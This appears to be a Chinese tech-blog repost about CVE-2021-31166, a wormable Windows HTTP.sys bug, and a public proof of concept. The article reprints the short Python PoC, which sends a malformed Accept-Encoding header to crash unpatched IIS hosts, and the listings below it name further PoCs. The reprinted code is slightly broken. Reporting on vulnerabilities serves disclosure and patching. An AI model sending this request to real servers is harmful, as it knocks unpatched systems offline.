服务器操作系统漏洞,Windows操作系统HTTP协议栈内存破坏漏洞PoC公开

最新推荐文章于 2023-11-11 17:17:03 发布
最新推荐文章于 2023-11-11 17:17:03 发布
阅读量283 收藏
点赞数
文章标签: 服务器操作系统漏洞

e3a54686f03b1f52ef734788700479b6.png

5月微软补丁日修复了一个CVSSv3评分9.8分的严重安全漏洞,该漏洞CVE编号为CVE-2021-31166。近日,有研究人员在GitHub上公布了该漏洞的PoC代码。

CVE-2021-31166漏洞是Windows操作系统中HTTP 协议栈的内存破坏漏洞。该协议栈是Windows内置的IIS 服务器使用的。如果IIS 服务器启用,攻击者就可以发送伪造的包来在操作系统kernel上执行也代码。微软称该漏洞可以被用来创建网络蠕虫,因此建议优先修复。

c17ca5a571884de74400b4450a79e195.png

虽然该漏洞CVSS评分为9.8分,听起来非常危险,但该漏洞只影响最新的一些Windows版本,具体影响Windows 10、Windows server 2004、Windows server 20H2的不同版本。

5月17日,安全研究人员Axel Souchet在GitHub上公开了该漏洞的PoC代码。该PoC代码可以使运行IIS 服务器的未修复的Windows系统奔溃,但是并没有实现蠕虫功能。

PoC代码参见:https://github.com/0vercl0k/CVE-2021-31166

import requests

import argparse

def main():

parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')

parser.add_argument('--target', required = True)

args = parser.parse_args()

r = requests.get(f'http://{args.target}/', headers = {

'Accept-Encoding': 'doar-e, ftw, imo, ,',

print(r)

PoC视频参见:https://github.com/0vercl0k/CVE-2021-31166/blob/main/pics/trigger.gif

参考及来源:https://therecord.media/poc-released-for-wormable-windows-iis-bug/

酒业资讯
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Poc/Exp漏洞验证利用脚本编写
悦分享
07-07 5396
一、安全名词1. POCPOC,Proof ofConcept,中⽂意思是“观点证明”。这个短语会在漏洞报告中使⽤,漏洞报告中的POC则是⼀段说明或者⼀个攻击的样例,使得读者能够确认这个漏洞是真实存在的。2. EXPEXP,Exploit,中文叫漏洞利用程序。意思就是该漏洞存在公开的利用方式(比如一个脚本),就是一段可以发挥漏洞价值的程序,对漏洞如何利⽤的详细说明或者⼀个演⽰的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利⽤的⽅法。想象一下这样的场景,目标存在一个 SQL 注入漏洞,然后被你知道了,然后
什么是POC漏洞
qq_44833342的博客
05-29 3115
poc漏洞概念
漏洞检测之POC的学习
qq_46162550的博客
09-27 5880
根据个人理解对POC漏洞验证进行小结。
记一次typecho反序列化漏洞的复现(第一次写poc版)
m0_62100902的博客
06-28 1183
经过一系列的代码审计,终于找到一个可以利用的点,其余的属性全都是写死了的,也就是静态this的调用方式,而这里不是静态的,它可以是别的对象里面去调用这个属性,那么我们可以想到一种魔术方法:__get(),这个魔术方法是当对象中调用不存在的属性时候会自动去调用这个魔术方法,那么我们需要去找到一个既有__get()魔术方法的又没有screenName这个属性的对象(这里终于来点感觉了),继续在代码审计工具里面找__get()说一说我的个人理解吧。举个例子,php与java之间是如何相互传输的呢?
盘点那些漏洞 POC 测试工具
wuli1024的博客
11-11 1260
以上工具覆盖仅仅个人总结,还有其他专注 POC 检测的工具,比如知道创宇的 pocsuite3,只随软件携带来十几个案例 POC,目前我使用最多的就是 xray、xpoc、nuclei 这些工具,最近开始用 afrog,大家有好用的工具欢迎留言讨论,一起学习探讨。文库目录:https://wiki.xazlsec.com/static/forder.html。
安全开发Python网页OA系统POC漏洞检测系统,框架FLask + python + OAPOC payload
07-19
Python网页OA系统POC漏洞检测系统 框架FLask + python + OAPOC payload 角色介绍 管理员 admin 123456 模块介绍 登录模块 首页模块 OA安全检测子模块(支持多个url或者单个url检测,调用payload并在界面回馈检测...
Python网页OA系统POC漏洞检测系统,框架FLask + python + OAPOC payload
07-19
Python网页OA系统POC漏洞检测系统 框架FLask + python + OAPOC payload 角色介绍 管理员 admin 123456 模块介绍 登录模块 首页模块 OA安全检测子模块(支持多个url或者单个url检测,调用payload并在界面回馈检测...
CVE-2022-37969 Windows 本地权限提升 PoC
08-23
CVE-2022-37969 是通用日志文件系统驱动 clfs 中的越界写入漏洞,通过该漏洞,可以完成提权。 // // Understanding the CVE-2022-37969 Windows Common Log File System Driver Local Privilege Escalation.  // ...
Cisco WebEx Meetings Windows 应用本地提权漏洞poc(CVE-2019-1674)
03-01
Cisco WebEx Meetings Windows 应用本地提权漏洞(CVE-2019-1674) 的poc,里面的poc可以一键对漏洞程序进行验证
Huawei Auth-Http Server 1.0 passwd文件泄露漏洞POC
07-05
-u 指定单个url -l 指定url文件 先用fofa脚本爬取所有Huawei Auth-Http相关资产(fofa脚本下载地址:) python3 fofa-cwillchris.py -k body="umweb/u20.png" 然后用此脚本 ./poc.bin -l url.txt
OpenSSH用户枚举漏洞poc(CVE-2018-15473)
08-24
OpenSSH用户枚举漏洞poc(CVE-2018-15473),通过poc可以直接检查目标服务器是否存在此漏洞,通过检查漏洞,来及早发现漏洞,打上补丁
大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞POC合集
最新发布
02-27
大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞POC合集
基于lstm的poc漏洞扫描检测
12-13
基于lstm的poc漏洞扫描检测,内含数据集以及源码可以作为预研demo
用友各种类型漏洞poc
06-15
用友公司成立于1988年,全面提供具有自主知识产权的企业管理/ERP软件、服务与解决方案,是中国最大的管理软件、ERP软件、集团管理软件、人力资源管理软件、客户关系管理软件及小型企业管理软件提供商。
通过POC来学习漏洞的原理
hl1293348082的专栏
03-29 2138
本文介绍的是 easyFTPServer 1.7.0.2 ‘Http’ remote Buffer Overflow 的漏洞执行流程,通过已知的 POC 来推断程序的大概执行流程以及漏洞利用原理。 Poc 和软件的下载地址: https://pan.baidu.com/s/1dHjKFCX (提取码 5h7h ) 0x01 了解 FTP FTP 服务全称为文件传输协议服务,其工作模式采用 C/S 模式,用户想要通过 FTP 服务访问到共享的文件信息时,首先需要在自己的计算机系统上运行一个 FT.
【关注观星公众号】渗透系列之POC编写之刷分大法
Websec
12-04 4229
一、前言:POC&EXP 什么是POC:即Proof of Concept,是业界流行的针对客户具体应用的验证性测试,根据用户对采用系统提出的性能要求和扩展需求的指标,在选用服务器上进行真实数据的运行,对承载用户数据量和运行时间进行实际测算,并根据用户未来业务扩展的需求加大数据量以验证系统和平台的承载能力和性能变化。在信息安全里,POC漏洞验证程序,功能为检测漏洞是否存在。poc和exp(全称Exploit)的区别就是,poc漏洞验证程序,exp是漏洞利用程序。针对通用型应用漏洞编写poc,可
渗透中 PoC、Exp、Payload、RCE、IOC,Shellcode 的区别
penriver的博客
11-12 2659
渗透中 PoC、Exp、Payload、RCE、IOC,Shellcode 的区别
提高警惕!黑客在 GitHub 上利用虚假 PoC 漏洞钓鱼
easylife206的专栏
10-28 584
公众号关注「奇妙的 Linux 世界」设为「星标」,每天带你玩转 Linux !莱顿高级计算机科学研究所的研究人员在GitHub上发现了数以千计存在问题的存储库,这些存储库为各种漏洞提供虚假的概念验证(PoC),并借此隐藏传播恶意软件。GitHub是最大的代码托管平台之一,研究人员用它来发布PoC漏洞,以帮助安全社区验证漏洞的修复或确定一个漏洞的影响和范围。据莱顿高级计算机科学研究所的研究人员称...
1day代表刚公开漏洞,或者公开后没有poc exp的漏洞
06-11
1day不一定代表刚公开漏洞,或者公开后没有poc exp的漏洞。 1day通常指的是一种漏洞的利用代码(exploit)在该漏洞公开不到24小时内出现的情况。这意味着漏洞已经被发现并被公开,但攻击者已经准备好利用该...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值